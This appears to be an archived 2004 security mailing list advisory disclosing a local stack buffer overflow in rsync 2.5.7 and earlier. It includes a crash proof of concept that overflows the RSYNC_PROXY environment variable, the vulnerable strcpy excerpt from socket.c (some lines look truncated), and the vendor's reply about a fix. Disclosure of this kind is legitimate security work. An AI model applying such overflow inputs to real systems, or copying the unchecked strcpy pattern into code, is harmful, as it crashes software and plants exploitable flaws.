Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
rsync <= 2.5.7 local buffer overflow (no root today:)

From: DownBload (downbloadhotmail.com)
Date: Mon Feb 09 2004 - 15:13:02 CST


There is a local buffer overflow in rsync <= 2.5.7.
Problem is in open_socket_out function (socket.c).
Attacker can overflow portbuf[10] buffer on stack and overwrite saved return
Rsync isn't suid so, no root shell today :-).

PoC example:
[rootlocalhost rsync-2.5.7]# export RSYNC_PROXY=`perl -e 'print "A" x
100,":","A" x 1000'`
[rootlocalhost rsync-2.5.7]# rsync localhost::
rsync: getaddrinfo:
AAAAAAAAAAAAAAAA: ai_family not supported
Segmentation fault
[rootlocalhost rsync-2.5.7]#

- socket.c
        char portbuf[10];
        char *h;
        int proxied = 0;
        char buffer[1024];
        char *cp;

        h = getenv("RSYNC_PROXY");
        proxied = (h != NULL) && (*h != '\0');

        if (proxied) {
                strlcpy(buffer, h, sizeof(buffer));
                cp = strchr(buffer, ':');
                if (cp == NULL) {
                                "invalid proxy specification: should be
                        return -1;
                *cp++ = '\0';
                strcpy(portbuf, cp); // <- OVERFLOW

Vendor response:
"Correct. I fixed this in the CVS version earlier this year. Since the proxy
data is coming from the local environment, I don't see a need to roll out an
update to 2.6.0 (which is the latest released version, BTW).
The fix will be in 2.6.1, which should be released in the next month or two."

DownBload / Illegal Instruction Labs

"Born under the lucky star magical,
but on this earth generally tragical."